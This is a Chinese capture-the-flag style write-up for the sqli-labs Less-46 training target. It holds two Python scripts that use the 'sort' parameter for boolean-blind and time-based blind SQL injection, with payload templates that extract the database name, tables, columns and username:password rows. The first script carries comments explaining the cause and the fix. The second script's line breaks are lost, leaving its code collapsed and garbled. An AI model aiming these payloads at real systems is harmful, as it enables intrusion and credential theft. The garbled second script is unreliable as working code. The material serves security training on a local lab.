实践环境基于sqli-lab靶场的第46关进行
bool盲注
代码如下:
import requests
from bs4 import BeautifulSoup# 定义获取用户名的函数,使用 BeautifulSoup 解析 HTML 页面,提取用户名信息
def get_username(resp):
    """Return the text of the cell the author treats as the username column, or ``None``.

    Lab helper for the sqli-labs Less-46 write-up: the page at the fixed CSS path below
    is parsed and the text of the first matching ``td`` is returned.

    Args:
        resp: the HTML body of a response (a ``str``, e.g. ``requests`` ``.text``).

    Returns:
        The cell text when the selector matches, ``None`` when it matches nothing
        (the page rendered no element at that position).
    """
    document = BeautifulSoup(resp, 'html.parser')
    # Fixed CSS path into the rendered result table; which row/column this is
    # depends on the lab page layout and is not verified here.
    cells = document.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')
    if not cells:
        # No element at that path: report "nothing found" rather than raising.
        return None
    return cells[0].text


# Generic boolean-blind helper, reused below for database name, table names,
# column names and row data by swapping the query template.
def boolean_blind_injection(query_template):
    """Recover a string one character at a time through a boolean page oracle.

    Lab-only script for sqli-labs Less-46; the templates in ``__main__`` point at the
    local training target. Root cause on the defending side: the page's ``sort``
    parameter is used (presumably in an ORDER BY) without an allow-list of column
    names, so the whole ``if(...)`` expression is evaluated by the database. The fix
    is to map the parameter onto a fixed set of permitted column names.

    Args:
        query_template: URL with ``{pos}`` and ``{mid}`` placeholders. The injected
            ``if(ascii(substr(<expr>,pos,1))>mid, id, username)`` picks the sort
            column depending on the comparison.

    Returns:
        The string recovered so far, one ``chr(left)`` per position.

    NOTE(review): the original paste lost its indentation; the per-character
    ``print(result)`` is assumed to sit inside the outer loop (progress output).
    """
    result = ''
    position = 1
    while True:
        # Binary search over printable ASCII: find the smallest value for which
        # "ascii(char) > value" is false, which is the character's code.
        left = 32
        right = 127
        while left < right:
            mid = (left + right) // 2
            # Build the probe URL from the template, current position and pivot.
            url = query_template.format(pos=position, mid=mid)
            try:
                # Send the GET request and fetch the page body.
                # NOTE(review): no timeout is passed, so a stalled request blocks here.
                resp = requests.get(url)
                # Read the first-row username from the page.
                username = get_username(resp.text)
                if username == 'Dumb':
                    # The author treats a first-row username of 'Dumb' as
                    # "comparison true" (sorted by id): move the lower bound up.
                    left = mid + 1
                else:
                    # Otherwise the comparison is false: move the upper bound down.
                    right = mid
            except requests.RequestException as e:
                # Request failure: report and stop the search for this character.
                # This break leaves only the inner loop; the outer loop still
                # stores chr(left) for whatever value left currently holds.
                print(f"Request error: {e}")
                break
        if left == 32:
            # A result of 32 is taken as end of string (past the end the
            # comparison never holds, so left never moves). NOTE(review): a real
            # space character (32) is indistinguishable from end-of-string here.
            break
        result += chr(left)
        position += 1
        print(result)
    return result


if __name__ == '__main__':
    # Template for recovering the database name.
    database_query = "http://localhost:8989/Less-46/index.php?sort=if(ascii(substr(database(),{pos},1))>{mid},id,username) -- "
    # Template for recovering the table names of the current database.
    table_query = "http://localhost:8989/Less-46/index.php?sort=if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{pos},1))>{mid},id,username) -- "
    # Template for recovering the column names of the users table.
    column_query = "http://localhost:8989/Less-46/index.php?sort=if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),{pos},1))>{mid},id,username) -- "
    # Template for recovering the row data of the users table.
    data_query = "http://localhost:8989/Less-46/index.php?sort=if(ascii(substr((select group_concat(username,':',password) from users),{pos},1))>{mid},id,username) -- "
    # Run the database-name step.
    boolean_blind_injection(database_query)
    # Table-name step (disabled in the original).
    # boolean_blind_injection(table_query)
    # Column-name step (disabled in the original).
    # boolean_blind_injection(column_query)
    # Row-data step (disabled in the original).
    #boolean_blind_injection(data_query)
时间盲注
代码如下:
import requests
import time# 配置参数
SLEEP_TIME = 3 # 每次注入的延时秒数
THRESHOLD = 1.5 # 响应时间判断阈值
TIMEOUT = SLEEP_TIME + 2 # 请求超时时间def time_injection(query_template):result = ""pos = 1session = requests.Session()while True:low, high = 32, 126current_char = Nonewhile low <= high:mid = (low + high) // 2payload = query_template.format(pos=pos,mid=mid,sleep=SLEEP_TIME)try:start = time.time()session.get(payload, timeout=TIMEOUT)cost = time.time() - startif cost > THRESHOLD: # 条件成立low = mid + 1else:high = mid - 1except requests.exceptions.Timeout:low = mid + 1 # 超时视为条件成立except Exception as e:print(f"请求错误: {e}")break# 检查有效字符if high >= 32 and high <= 126:result += chr(high)print(f"[*] 当前结果: {result}")pos += 1else:breakreturn resultif __name__ == '__main__':# 定义注入模板(注意统一参数顺序)templates = {'数据库': "http://localhost:8989/Less-46/index.php?sort=IF(ASCII(SUBSTR(database(),{pos},1))>{mid},SLEEP({sleep}),0)",'表名': "http://localhost:8989/Less-46/index.php?sort=IF(ASCII(SUBSTR((SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()),{pos},1))>{mid},SLEEP({sleep}),0)",'列名': "http://localhost:8989/Less-46/index.php?sort=IF(ASCII(SUBSTR((SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='users'),{pos},1))>{mid},SLEEP({sleep}),0)",'数据': "http://localhost:8989/Less-46/index.php?sort=IF(ASCII(SUBSTR((SELECT GROUP_CONCAT(username,0x7e,password) FROM users),{pos},1))>{mid},SLEEP({sleep}),0)"}for name, template in templates.items():print(f"\n[+] 正在爆破 {name}...")data = time_injection(template)print(f"[+] {name} 结果: {data}\n")